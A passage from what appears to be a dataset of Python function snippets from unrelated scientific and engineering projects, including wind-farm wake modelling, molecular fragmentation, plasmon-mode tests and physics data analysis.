other_wakes(self, current, *turbines):\r\n \"\"\" EXECUTE THIS FUNCTION IN THE FARM CLASS! \"\"\"\r\n self.nodisplacements = []\r\n self.procedures = []\r\n \r\n # blockage matrices:\r\n self.bn = []\r\n self.bt = []\r\n \r\n for i, turbine in enumerate(turbines):\r\n # append the own wake matrices when the current turbine is \r\n # compared to itself:\r\n \r\n if i == current:\r\n self.bn.append(Turbine.wn)\r\n self.bt.append(Turbine.wt)\r\n elif i != current:\r\n # it is shadowed when at least one control point of the current\r\n # turbine lies in the direct wake of the i-th turbine.\r\n self.shadowed = np.any((self.yi[i]>=-1) & (self.yi[i]<=1))\r\n self.behind = self.x0 > turbine.x0\r\n \r\n if (self.shadowed and self.behind):\r\n # compute obstruction matrices:\r\n self.set_templates(self.yi[i])\r\n self.offset_templates(i, turbine)\r\n \r\n # offsetted block matrices are appended to the list:\r\n self.bn.append(self.newQn)\r\n self.bt.append(self.newQt)\r\n else:\r\n # add empty blockage matrices if there is no obstruction:\r\n self.bn.append(np.copy(Turbine.zeros))\r\n self.bt.append(np.copy(Turbine.zeros))", "def gram_schmidt(basis):\n b1 = basis[0]\n b2 = basis[1]\n\n basis1 = b1 / sqrt(innerprod_q2(b1, b1))\n b2 = b2 - innerprod_q2(basis1, b2) * basis1\n basis2 = b2 / sqrt(innerprod_q2(b2, b2))\n\n basis_o = [basis1, basis2]\n\n return (basis_o)", "def make_words(self,lm):\n if \" \" in self.corpus[0] and \" \" in self.corpus[1]: \n print \"assuming BLICK\"\n self.corpus = [convert_to_disc(i) for i in self.corpus]\n else:\n self.disc = 1\n print \"assuming Disc\" \n if not os.path.isfile(self.f): ##check if it already exists\n print \"generating 10 million words\"\n outfile = open(self.f, \"w\")\n outfile.write(\"word,blick,ngram,Real,T,disc\\n\")\n for word in self.corpus:\n write_row_of_bigmatch(word, self.disc, outfile, lm, \"Real\", \"1\")\n while len(self.wordlist)<10000000: \n words = lm.generate(100)\n for word in words:\n if word not in self.wordlist and len(word) < 9: #keep only words less than len9\n write_row_of_bigmatch(word, self.disc, outfile, lm, \"Simulated\", \"0\")\n self.wordlist[word] = 0\n return", "def create_ising_wishbone(h, w, **kwargs):\n assert h == 2 # Only works for 2 branches\n G = nx.empty_graph(h * w)\n n = w\n G.add_edges_from([(v, v+1) for v in range(n-1)])\n G.add_edges_from([(v, v+1) for v in range(n,2*n-1)])\n G.add_edges_from([(v, v+n) for v in range(n // 2)]) # Connect first half of nodes\n return nx.to_numpy_matrix(G)", "def _get_brown_clusters(self, a_feats, a_toks1, a_toks2):\n bcluster_str = \"\"\n for w1, _ in a_toks1:\n if w1 not in BROWN_CLUSTERS:\n continue\n for w2, _ in a_toks2:\n if w2 not in BROWN_CLUSTERS:\n continue\n bcluster_str = \"BrownCluster-\" + BROWN_CLUSTERS[w1] + '%' + \\\n BROWN_CLUSTERS[w2]\n a_feats[bcluster_str] = 1.", "def bond_strain_list(xy, BL, bo):\n bL = bond_length_list(xy, BL)\n # print 'len(bL) = ', len(bL)\n # print 'len(bo) = ', len(bo)\n bs = (bL - bo) / bo\n return bs", "def snake(A, B, M, N, k, y):\n\n x = y - k\n while (x < M) and (y < N) and (A[x] == B[y]):\n x = x + 1\n y = y + 1\n return y", "def _check_multiplicity(self, k, i):\n for j in range(self._.d + 1):\n if self._.a[i] >= k[i]:\n raise InfeasibleError(\"%s of %s %d too large\" %\n (self.SIZE, self.PART, i))", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def declare_budget(model, k, relays):\n m = model\n\n m.budget = pe.Constraint(expr=sum(m.delta[r] for r in relays) <= k)", "def create_hard_blocks(self):\n for x in xrange(1, self.map_size[0], 2):\n for y in xrange(1, self.map_size[1], 2):\n self.create_hard_block_at(x, y)", "def test_breath_first_traversal(our_bsts):\n bft = []\n for i in our_bsts[0].breadth_first_traversal():\n bft.append(i)\n assert bft == our_bsts[3]", "def offspring_fertility(n1=4,n2=4):\n ary = np.zeros( (n1,n2, n1,n2, 3), float )\n for i in range(n1):\n for j in range(n2):\n for k in range(n1):\n for l in range(n2):\n # set group counter to zero (one counter is sufficient)\n gc1 = 0\n for index in [i,j,k,l]: \n if index in [0,1]: gc1+=1\n if gc1==0 or gc1==4:\n ary[i,j,k,l,0] = 1. # set mark at S0\n elif gc1==1 or gc1==3:\n ary[i,j,k,l,2] = 1. # set mark at S2\n else:\n ary[i,j,k,l,1] = 1. # set mark at S1\n return ary", "def w_mark2_gen(w_amount, w_length, dict_2_let):\r\n nword_list_m2 = []\r\n for i in range(w_amount):\r\n rand_2_let = rand_let_gen(dict_2_let)\r\n nword = \"\".join(rand_2_let)\r\n i = 0\r\n while len(nword) != w_length:\r\n prefix = nword[i:i+2:1]\r\n if dict_2_let.get(prefix) != None:\r\n nword += (dict_2_let[prefix][0])\r\n i += 1\r\n else:\r\n i = 0\r\n rand_2_let = rand_let_gen(dict_2_let)\r\n nword_list_m2.append(nword)\r\n return nword_list_m2", "def _dks_to_khlp_on_basis(self, la):\n Sym = self._kBoundedRing.ambient()\n kB = Sym.kBoundedSubspace(self.k, t=self.t)\n Qp = Sym.hall_littlewood(t=self.t).Qp()\n ks = kB.kschur()\n kHLP = self._kBoundedRing.kHallLittlewoodP()\n return sum( ks(Qp(x)).coefficient(la) * kHLP(x) for x in PartitionsGreatestLE(sum(la), self.k))", "def _get_identifiers_from_kbs(self) -> dict:\n id_mapping_dict = defaultdict(set)\n\n for kb in self.kbs:\n sys.stdout.write('\\n%s \\n' % kb.name)\n for p in tqdm.tqdm(kb.pathways, total=len(kb.pathways)):\n for ent in p.entities:\n id_set = list(set(ent.xrefs))\n if len(id_set) == 1:\n id_mapping_dict[id_set.pop()] = set([])\n for p, q in itertools.combinations(id_set, 2):\n id_mapping_dict[p].add(q)\n id_mapping_dict[q].add(p)\n\n return id_mapping_dict", "def create_fk_chain(controls, joints):\n\n # create control offset transforms\n constraints = []\n exp_tf_ms = []\n\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par: cmds.parent(buf, par[0])\n\n exp_tf_ms.append(buf)\n\n for src, trg in zip(controls, joints):\n # constrain fk joints to controls, hide the constraint nodes\n pc = cmds.parentConstraint(src, trg, mo=True)[0]\n cmds.setAttr('{node}.interpType'.format(node=pc), 2)\n cmds.setAttr('{node}.visibility'.format(node=pc), False)\n sc = cmds.scaleConstraint(src, trg)[0]\n cmds.setAttr('{node}.visibility'.format(node=sc), False)\n constraints.extend([pc, sc])\n\n return constraints, exp_tf_ms", "def set_limits(self):\n K = self.parents\n S = self.structure\n T = self.T_zero\n kinematic_map = self.kinematic_map\n T_axis = trans_axis(self.axis_length, \"z\")\n for u in K:\n for v in (des for des in K.successors(u) if des):\n S[u][v][LOWER] = S[u][v][DIST]\n S[u][v][UPPER] = S[u][v][DIST]\n for v in (des for des in level2_descendants(K, u) if des):\n names = [\n (f\"p{u[1:]}\", f\"p{v[1:]}\"),\n (f\"p{u[1:]}\", f\"q{v[1:]}\"),\n (f\"q{u[1:]}\", f\"p{v[1:]}\"),\n (f\"q{u[1:]}\", f\"q{v[1:]}\"),\n ]\n\n for ids in names:\n path = kinematic_map[u][v]\n T0, T1, T2 = [T[path[0]], T[path[1]], T[path[2]]]\n\n if \"q\" in ids[0]:\n T0 = T0.dot(T_axis)\n if \"q\" in ids[1]:\n T2 = T2.dot(T_axis)\n\n d_max, d_min, limit = self.max_min_distance(T0, T1, T2)\n\n if limit:\n\n rot_limit = rot_axis(self.ub[v], \"z\")\n\n T_rel = T1.inv().dot(T2)\n\n d_limit = norm(T1.dot(rot_limit).dot(T_rel).trans - T0.trans)\n\n if limit == \"above\":\n d_max = d_limit\n else:\n d_min = d_limit\n\n self.limited_joints += [v]\n self.limit_edges += [[ids[0], ids[1]]] # TODO remove/fix\n\n S.add_edge(ids[0], ids[1])\n if d_max == d_min:\n S[ids[0]][ids[1]][DIST] = d_max\n S[ids[0]][ids[1]][UPPER] = d_max\n S[ids[0]][ids[1]][LOWER] = d_min\n S[ids[0]][ids[1]][BOUNDED] = limit", "def make_m2_crv(TSUGITE_list, SHIGUCHI_list):\n \"\"\"\n 1 Get information from TSUGITE_list and SHIGUCHI_list.\n \"\"\"\n # TSUGITE\n # Left----------------------------------------------------------------------\n # material2\n m2_left_list = TSUGITE_list[0]\n m2_left_upper = m2_left_list[0]\n m2_left_middle = m2_left_list[1]\n m2_left_lower = m2_left_list[2]\n\n # SHIGUCHI\n m2_KUMIKI_points1 = SHIGUCHI_list[4]\n m2_KUMIKI_points2 = SHIGUCHI_list[5]\n\n m2_KUMIKI_points1.reverse()\n\n m2_left_upper.extend(m2_KUMIKI_points1)\n m2_left_upper.append(m2_left_upper[0])\n m2_left_upper_crv = rs.AddPolyline(m2_left_upper)\n\n m2_left_middle.extend(m2_KUMIKI_points1)\n m2_left_middle.append(m2_left_middle[0])\n m2_left_middle_crv = rs.AddPolyline(m2_left_middle)\n\n m2_left_lower.extend(m2_KUMIKI_points1)\n m2_left_lower.append(m2_left_lower[0])\n m2_left_lower_crv = rs.AddPolyline(m2_left_lower)\n\n m2_left_crvs = [m2_left_upper_crv, m2_left_middle_crv, m2_left_lower_crv]\n\n # Right---------------------------------------------------------------------\n m2_right_list = TSUGITE_list[1]\n m2_right_upper = m2_right_list[0]\n m2_right_middle = m2_right_list[1]\n m2_right_lower = m2_right_list[2]\n\n # SHIGUCHI\n m2_KUMIKI_points1 = SHIGUCHI_list[0]\n m2_KUMIKI_points2 = SHIGUCHI_list[1]\n\n # Extend\n # material2\n m2_right_upper.reverse()\n m2_right_middle.reverse()\n m2_right_lower.reverse()\n\n # m2_KUMIKI_points1.reverse()\n\n m2_right_upper.extend(m2_KUMIKI_points1)\n m2_right_upper.append(m2_right_upper[0])\n m2_right_upper_crv = rs.AddPolyline(m2_right_upper)\n\n m2_right_middle.extend(m2_KUMIKI_points1)\n m2_right_middle.append(m2_right_middle[0])\n m2_right_middle_crv = rs.AddPolyline(m2_right_middle)\n\n m2_right_lower.extend(m2_KUMIKI_points1)\n m2_right_lower.append(m2_right_lower[0])\n m2_right_lower_crv = rs.AddPolyline(m2_right_lower)\n\n m2_right_crvs = [m2_right_upper_crv, m2_right_middle_crv, m2_right_lower_crv]\n\n return m2_left_crvs, m2_right_crvs", "def test_markow_chain():\n amount = len(markow_chain(SNULL, TIMESTEPS, PROBABILITYMATRIX))\n assert TIMESTEPS == amount", "def build_blacklist(blk_lst):\n bad_pair_dict = {}\n for stu in blk_lst:\n if stu[0] in bad_pair_dict: # Appends additional student to stu[0]'s blacklist\n bad_pair_dict[stu[0]].add(stu[1])\n else: # Adds stu[0] to the blacklist dict with the set of themself and their banned partner\n bad_pair_dict[stu[0]] = {stu[0], stu[1]}\n if stu[1] in bad_pair_dict: # Mirrors the actions taken above now for stu[1]\n bad_pair_dict[stu[1]].add(stu[0])\n else: # Mirrors the actions taken above now for stu[1]\n bad_pair_dict[stu[1]] = {stu[0], stu[1]}\n return bad_pair_dict", "def get_building_blocks(self, level=1, debug=False):\n\n def get_aidx_star(dic, ias, kas):\n iat, jat = kas\n if dic[iat] == 0:\n return iat, jat\n elif dic[jat] == 0:\n return jat, iat\n else:\n print('#ERROR:?')\n raise\n\n def get_aidxs_patt(m0, patt, ias0):\n Qi = Chem.MolFromSmarts( patt )\n zs_i = [ ai.GetAtomicNum() for ai in Qi.GetAtoms() ]\n iass_i = m0.GetSubstructMatches(Qi)\n ias0.sort()\n #print ' ** ias0 = ', ias0\n iok = False\n for ias in iass_i:\n #print ' ** matched ias = ', ias\n if set(ias) == set(ias0):\n iok = True; break\n assert iok\n dic = dict(list(zip(ias, zs_i)))\n return ias, dic\n\n assert (not self.ih), '#ERROR: pls set `ih=False to get building blocks'\n m1 = copy.deepcopy( self.m )\n Chem.RemoveStereochemistry(m1)\n\n iars = []\n for ai in m1.GetAtoms():\n iars.append( ai.GetIsAromatic() )\n\n # first update BO for groups such as amide (-N-C(=O), -O-C(=O), ...\n # that is, we consider that the single bonds in these groups can\n # not be broken. This has to be imposed for predicting mp/bp.\n bom = copy.deepcopy( self.bom )\n # as no single bond in any of ['[N-]=[N+]=C', '[N+]#[C-]', '[N-]=[N+]=N']\n # we skip them here\n for pat_i in [ '[O-][N+](=O)', ]: # 'NC(=O)', 'OC(=O)'\n Qi = Chem.MolFromSmarts( pat_i )\n for tsi in m1.GetSubstructMatches(Qi):\n i,j,k = tsi\n bij = bom[i,j] + 100 ##\n bjk = bom[j,k] + 100\n bom[i,j] = bom[j,i] = bij\n bom[k,j] = bom[j,k] = bjk\n\n obsolete = \"\"\"\n # don't break any ring, as such rigid structure has a dramtic effect\n # on mp prediction, so keep them as much as possible for selection\n # of molecules for training\n nodes_r = self.get_ring_nodes(3,6)\n for nodes_i0 in nodes_r:\n nodes_i = list( nodes_i0 )\n nai = len(nodes_i)\n for i in range(nai-1):\n for j in range(i+1,nai):\n boij = bom[i,j]\n if boij > 0:\n bom[i,j] = bom[j,i] = boij + 0.15\n \"\"\"\n\n ## RDKit somehow cannot correctly process '[*;!H]' as a heavy\n ## atom; instead '[*;!#1]' works. A bug??\n heav_smarts = '*;!#1'\n\n m = Chem.AddHs(m1)\n m.UpdatePropertyCache(False)\n\n # get bond idxs that can be broken\n # We assume aromatic bonds can be broken; otherwise\n # very few amons can be found for molecules consisting\n # of aromatic atoms\n bom2 = np.triu( bom )\n #ias1, ias2 = np.where( bom2 > 0 ) #\n ias1, ias2 = np.where( np.logical_and( bom2 <= 3, bom2 > 0 ) )\n nb = len(ias1)\n bidxs = []\n for i in range(nb):\n ia1, ia2 = ias1[i], ias2[i]\n bi = m.GetBondBetweenAtoms(ia1, ia2)\n bidx = bi.GetIdx()\n bidxs.append( bidx )\n nb = len(bidxs)\n if nb == 0:\n # no bonds can be broken, i.e., a big aromatic system\n return Chem.MolToSmiles(m)\n\n bidxs.sort()\n #print ' -- bonds = '\n #print np.array([ias1,ias2]); sys.exit(2)\n self.bidxs = bidxs\n\n # now get fragments\n\n # break all bonds with bo = 1\n m2 = Chem.FragmentOnBonds(m, bidxs)\n ts = Chem.MolToSmiles(m2).split('.')\n\n # vital step\n # if this is not done, a fragment like C([*])([*])([*])\n # will also match >CH-, >CH2, -CH3, which we hope not to happen\n # This is inevitable if we don't substitute \"*\" by \"*;!H\"\n # ( H's are present in `m)\n tsU = []\n for ti in ts:\n tsU.append( re.sub('\\*', heav_smarts, ti) )\n ts = tsU\n tsU = list( set( ts ) )\n #print ' -- tsU = ', tsU\n\n if level == 1:\n return tsU\n else:\n iass = []\n mqs = []\n dics = []\n tss = []\n cnodes = []\n for tsi in tsU:\n Qi = Chem.MolFromSmarts( tsi )\n zs_i = []; degrees_i = []\n for ai in Qi.GetAtoms():\n zs_i.append( ai.GetAtomicNum() )\n degrees_i.append( ai.GetDegree() )\n naQ = len(zs_i); iasQ = np.arange(naQ)\n dgrmax = max(degrees_i)\n zs_i = np.array(zs_i)\n degrees_i = np.array(degrees_i)\n ics = iasQ[ np.logical_and(degrees_i == dgrmax, zs_i > 1) ]\n if debug: print((' ics, tsi = ', ics, tsi))\n assert len(ics) == 1, '#ERROR: there should be only one heavy atom with maxiaml degree!'\n #ic = ics[0]\n iass_i = m.GetSubstructMatches(Qi)\n for ias in iass_i:\n #ias = np.array(ias)\n mqs.append( Qi )\n tss.append( tsi )\n dics.append( dict(list(zip(ias, zs_i))) )\n iass.append( list(ias) )\n cnodes.append( ias[ics[0]] ) # [ias[ic] for ic in ics] )\n\n ng = len(iass)\n ts2 = []\n if level == 1.5:\n for i in range(ng-1):\n ias = iass[i]\n mi = mqs[i]\n na1 = len(ias)\n dic_i = dics[i]\n for j in range(i+1,ng):\n mj = mqs[j]\n jas = iass[j]\n dic_j = dics[j]\n kas = list( set(ias).intersection( set(jas) ) )\n if len(kas) == 2:\n # get idx of atom in `m corresponding to [*] in `mi and `mj\n\n if bom[kas[0],kas[1]] == 0:\n # C1C=CC(=O)C=C1\n # 0 1 23 4 5 6 -- atomic index\n # mi = '[*]C=C[*]', ias = [0,1,2,3]\n # mj = '[*]C=C[*]', jas = [3,5,6,0]\n # kas = [3,0] but bom[0,3] = 0, i.e., these two frags cannot bind!\n continue\n try:\n iat, jat = get_aidx_star(dic_i, ias, kas)\n except:\n # e.g., [*]O is a frag of [*][N+](=O)[O-]\n # [*][N+](=O)[O-] [*]O [25, 26]\n # [24, 25, 27, 26] [25, 26]\n # {24: 0, 25: 7, 26: 8, 27: 8} {25: 0, 26: 8}\n continue\n ia = ias.index(iat); ja = jas.index(jat)\n mij = Chem.CombineMols(mi,mj)\n mc = Chem.EditableMol(mij)\n\n # reconnect the bond first\n ia2 = ias.index(jat); ja2 = jas.index(iat)\n print(('ia2,ja2 = ', ia2,ja2))\n bij = m.GetBondBetweenAtoms(iat,jat)\n mc.AddBond(ia2, ja2+na1, bij.GetBondType() ) #rdkit.Chem.rdchem.BondType.SINGLE)\n\n # delete the atom in mij\n ia = ias.index(iat);\n ldxs = [ia, ja+na1]\n\n for l in range(2):\n mc.RemoveAtom(ldxs[l]-l)\n\n mcU = mc.GetMol()\n #mcU2 = Chem.RemoveHs(mcU)\n smi = Chem.MolToSmiles( mcU)\n if '.' in smi:\n # e.g., [*]C[*] [*]C[*] [19, 21]\n # [18, 19, 21] [20, 19, 21]\n # {18: 0, 19: 6, 21: 0} {19: 6, 20: 0, 21: 0}\n # [*].[*]C[*]\n continue\n #if '[*]' not in smi:\n # print '\\n', tss[i], tss[j], kas\n # print ias, jas\n # print dic_i, dic_j\n # print smi\n if smi not in ts2: ts2.append(smi)\n elif level == 2:\n # account for all neighbors of any env in\n ifs = list(range(ng))\n for i in ifs:\n\n ias = iass[i]\n mi = mqs[i]; #mic = mqs[i]\n na1 = len(ias); #na1c = len(ias)\n dic_i = dics[i]; #dic_ic = dics[i]\n jfs = list( set(ifs)^set([i]) )\n\n if debug: print(('i, mi, ias = ', i, tss[i], ias))\n #print ' -- i = ', i\n\n icnt = 0\n cnode = cnodes[i]\n for j in jfs:\n #print ' icnt = ', icnt\n mj = mqs[j]\n jas = iass[j]\n if debug:\n print((' j, mj, jas = ', j, tss[j], jas))\n if icnt > 0:\n print(' mi, ias = ', '', patt, ias)\n print(' dic_i = ', dic_i)\n else:\n print(' _mi, ias = ', '', tss[i], ias)\n dic_j = dics[j]\n kas = list( set(ias).intersection( set(jas) ) )\n #print ' -- cnode, kas = ', cnode, kas\n if ( len(kas) == 2 ) and ( cnode in set(kas) ):\n if debug:\n print(' -- kas = ', kas)\n if bom[kas[0],kas[1]] == 0:\n # C1C=CC(=O)C=C1\n # 0 1 23 4 5 6 -- atomic index\n # mi = '[*]C=C[*]', ias = [0,1,2,3]\n # mj = '[*]C=C[*]', jas = [3,5,6,0]\n # kas = [3,0] but bom[0,3] = 0, i.e., these two frags cannot bind!\n continue\n\n las = list( set(ias) | set(jas) ); las.sort()\n try:\n # get idx of atom in `m corresponding to [*] in `mi and `mj\n iat, jat = get_aidx_star(dic_i, ias, kas)\n except:\n # e.g., [*]O is a frag of [*][N+](=O)[O-]\n # [*][N+](=O)[O-] [*]O [25, 26]\n # [24, 25, 27, 26] [25, 26]\n # {24: 0, 25: 7, 26: 8, 27: 8} {25: 0, 26: 8}\n continue\n\n\n mij = Chem.CombineMols(mi,mj)\n #print ' combined smi = ', Chem.MolToSmiles(mij,canonical=False)\n mc = Chem.EditableMol(mij)\n\n # reconnect the bond first\n ia2 = ias.index(jat); ja2 = jas.index(iat)\n #print ' __ ia2, ja2 = ', ia2, ja2+na1\n bij = m.GetBondBetweenAtoms(iat,jat)\n mc.AddBond(ia2, ja2+na1, bij.GetBondType() ) #rdkit.Chem.rdchem.BondType.SINGLE)\n\n # delete the atom in mij\n ia = ias.index(iat); ja = jas.index(jat)\n #print ' __ ia2, ja2, ia, ja = ', ia2, ja2, ia, ja\n ldxs = [ia, ja+na1]; #print ' __ ldxs = ', ldxs\n for l in range(2):\n mc.RemoveAtom(ldxs[l]-l)\n\n # update `mi\n #try:\n mi2 = mc.GetMol()\n patt = Chem.MolToSmiles( mi2, canonical=False )\n mi3 = Chem.MolFromSmarts(patt)\n patt = re.sub('\\-', '', patt)\n patt = re.sub('\\*', heav_smarts, patt)\n if debug:\n print(' -- patt = ', patt)\n\n if '.' in patt:\n # e.g., [*]C[*] [*]C[*] [19, 21]\n # [18, 19, 21] [20, 19, 21]\n # {18: 0, 19: 6, 21: 0} {19: 6, 20: 0, 21: 0}\n # [*].[*]C[*]\n continue\n else:\n # update `ias\n ias, dic_i = get_aidxs_patt(m, patt, las)\n mi = mi3\n if debug:\n print(' -- ias = ', ias)\n na1 = len(ias)\n\n icnt += 1\n try:\n smi = Chem.MolToSmiles( Chem.MolFromSmarts(patt), canonical=True )\n smi = re.sub('\\-', '', smi)\n smi = re.sub('\\*', heav_smarts, smi)\n\n if smi not in ts2: ts2.append(smi)\n except:\n pass\n print(' icnt = ', icnt)\n print(' j, mj, jas = ', j, tss[j], jas)\n print(' i, mi, ias = ', i, tss[i], ias)\n return ts2\n else:\n print('#ERROR: not implemented')\n raise", "def __no_crossing(self):\n for pos_left_1 in range(self.n):\n for pos_left_2 in range(pos_left_1 + 1, self.n):\n for pos_right_2 in range(self.n):\n for pos_right_1 in range(pos_right_2 + 1, self.n):\n # For all i, j, k, m | k < i and m > j . not w(i, j) or not w(k, m)\n self.__clause(-self.preds.w(pos_left_1, pos_right_1),\n -self.preds.w(pos_left_2, pos_right_2))", "def test_2_layer():\r\n # angular frequency in radians * THz\r\n w = 100 * nu.THz\r\n # Relative permittivity of metal and dielectric\r\n em = -4.56 + 0.12j\r\n ed = 1.23 + 0.01j\r\n ex_list = ez_list = [ed, em]\r\n # Relative permeabilities\r\n mu_list = [1,1]\r\n # Dictionary of input parameters\r\n input_params = {'w': w, 'd_list': [inf,inf], 'ex_list': ex_list,\r\n 'ez_list': ez_list, 'mu_list': mu_list}\r\n \r\n # Calculate the theoretical kx\r\n theo_kx = (w / nu.c0) * cmath.sqrt((em * ed) / (em + ed))\r\n if theo_kx.imag < 0:\r\n theo_kx *= -1\r\n print('Theoretical kx:',\r\n '(%.7g+%.7gj) rad/um' % (theo_kx.real / nu.um**-1, theo_kx.imag / nu.um**-1))\r\n \r\n # If I use the theoretical kx value, the mode should be correct and\r\n # all my tests should pass.\r\n params = deepcopy(input_params)\r\n params['kx'] = theo_kx\r\n params = find_all_params_from_kx(params)\r\n kzd, kzm = params['kz_list']\r\n # check that kz_list is correct\r\n assert_floats_are_equal(kzd**2, (w**2 / nu.c0**2) * ed**2 / (em + ed))\r\n assert_floats_are_equal(kzm**2, (w**2 / nu.c0**2) * em**2 / (em + ed))\r\n # check that layer_bottom_list is correct\r\n assert params['layer_bottom_list'][0] == -inf\r\n assert params['layer_bottom_list'][1] == 0\r\n # Check that the boundary condition matrix agrees with hand-calculation\r\n bc_mat = bc_matrix(params)\r\n # ...top-left is Ex0down / H0down\r\n assert_floats_are_equal(bc_mat[0,0], -kzd / (w * ed * nu.eps0))\r\n # ...top-right is -Ex1up / H1up\r\n assert_floats_are_equal(bc_mat[0,1], -kzm / (w * em * nu.eps0))\r\n # ...bottom-left is eps0 * Ez0down / H0down\r\n assert_floats_are_equal(bc_mat[1,0], ed * -theo_kx / (w * ed * nu.eps0))\r\n # ...bottom-right is -eps1 * Ez1up / H1up\r\n assert_floats_are_equal(bc_mat[1,1], -em * -theo_kx / (w * em * nu.eps0))\r\n # Check that one of the eigenvalues is almost zero (compared to the size\r\n # of the matrix elements).\r\n eigenvalues = np.linalg.eig(bc_mat)[0]\r\n assert abs(eigenvalues).min() / abs(bc_mat).max() < 1e-6\r\n # Check that the mode passes all tests.\r\n assert check_mode(params, thorough=True) is True\r\n # Check that I can scale the fields and it still passes all tests.\r\n params_scaled = rescale_fields(1.23+4.56j, params)\r\n assert check_mode(params_scaled, thorough=True) is True\r\n \r\n # Now try my kx-finding algorithm, to see if it finds the right value.\r\n kx_list = find_kx(input_params)\r\n print('kx_list:',\r\n ['(%.7g+%.7gj) rad/um' % (kx.real / nu.um**-1, kx.imag / nu.um**-1)\r\n for kx in kx_list])\r\n kx = kx_list[0]\r\n assert_floats_are_equal(theo_kx, kx)\r\n \r\n plot_mode(params)\r\n \r\n print('If you see this message, all the tests succeeded!!')", "def generate_pn2kc_weights(nb_pn, nb_kc, min_pn=10, max_pn=20, aff_pn2kc=None, nb_trials=100000, baseline=25000,\r\n rnd=np.random.RandomState(2018), dtype=np.float32):\r\n\r\n dispersion = np.zeros(nb_trials)\r\n best_pn2kc = None\r\n\r\n for trial in range(nb_trials):\r\n pn2kc = np.zeros((nb_pn, nb_kc), dtype=dtype)\r\n\r\n if aff_pn2kc is None or aff_pn2kc <= 0:\r\n vaff_pn2kc = rnd.randint(min_pn, max_pn + 1, size=nb_pn)\r\n else:\r\n vaff_pn2kc = np.ones(nb_pn) * aff_pn2kc\r\n\r\n # go through every kenyon cell and select a nb_pn PNs to make them afferent\r\n for i in range(nb_pn):\r\n pn_selector = rnd.permutation(nb_kc)\r\n pn2kc[i, pn_selector[:vaff_pn2kc[i]]] = 1\r\n\r\n # This selections mechanism can be used to restrict the distribution of random connections\r\n # compute the sum of the elements in each row giving the number of KCs each PN projects to.\r\n pn2kc_sum = pn2kc.sum(axis=0)\r\n dispersion[trial] = pn2kc_sum.max() - pn2kc_sum.min()\r\n # pn_mean = pn2kc_sum.mean()\r\n\r\n # Check if the number of projections per PN is balanced (min max less than baseline)\r\n # if the dispersion is below the baseline accept the sample\r\n if dispersion[trial] <= baseline: return pn2kc\r\n\r\n # cache the pn2kc with the least dispersion\r\n if best_pn2kc is None or dispersion[trial] < dispersion[:trial].min():\r\n best_pn2kc = pn2kc\r\n\r\n # if non of the samples have dispersion lower than the baseline,\r\n # return the less dispersed one\r\n return best_pn2kc", "def SecondPart():\n return countAllBagsIn(targetBag, organizedBags)", "def check_BDT_simulations_slice_KS(bolo_name, analysis_type, mass):\n\n\tplt.ion()\n\n\tpop_path = \"../Analyse_\" + bolo_name + \"/Populations/Pop_for_scaling/\"\n\tBDT_path = \"/home/irfulx204/mnt/tmain/Desktop/Run308_BDT_simu_better/BDT_\" + bolo_name + \"/\" + analysis_type + \"/\"\n\n\tttrue,ftrue = PyRPl.open_ROOT_object(\"../Fond_ERA_merged/\" + bolo_name + \"_\" + analysis_type + \"_lowmass_fond.root\", \"t_merged\")\n\ttsimu, fsimu = PyRPl.open_ROOT_object(BDT_path +\"True_events/ROOT_files/\" + bolo_name + \"_true_events_tree.root\", \"t_new0\")\n\n\tprint \"true: \", ttrue.GetEntries(\"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\tprint \"simu: \", tsimu.GetEntries(\"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\n\tttrue.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist(1000,-2,15,1000,-2,15\", \"\")\n\ttsimu.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist2(1000,-2,15,1000,-2,15\", \"\")\n\n\t# ttrue.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\t# tsimu.Draw(\"0.5*(EIB+EID):0.5*(EC1+EC2)>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\t# ttrue.Draw(\"0.414*EIB+(1-0.414)*EID:0.574*EC1+(1-0.574)*EC2>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0 && EIA<2 && EIC<2\")\n\t# tsimu.Draw(\"0.414*EIB+(1-0.414)*EID:0.574*EC1+(1-0.574)*EC2>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\n\t# ttrue.Draw(\"EIB:EID>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0 && EIA<2 && EIC<2\")\n\t# tsimu.Draw(\"EIB:EID>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\t# ttrue.Draw(\"EC1:EC2>>hist(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0 && EIA<2 && EIC<2\")\n\t# tsimu.Draw(\"EC1:EC2>>hist2(1000,-2,15,1000,-2,15\", \"EIB>2 && EID>2 && abs(EIB-EID)<1 && abs(EIB-EC1)<4 && EC1>2.0\")\n\n\thist.SetMarkerColor(kRed)\n\thist.SetMarkerStyle(20)\n\thist2.SetMarkerStyle(20)\n\thist.Draw()\n\thist2.Draw(\"same\")\n\n\traw_input()\n\n\t#Open event files\n\tdata_types = {\"names\": (\"EC1\", \"EC2\", \"EIA\", \"EIB\", \"EIC\", \"EID\"), \"formats\": (\"f\", \"f\", \"f\", \"f\", \"f\", \"f\")}\n\n\tarr_true = np.loadtxt(pop_path + bolo_name + 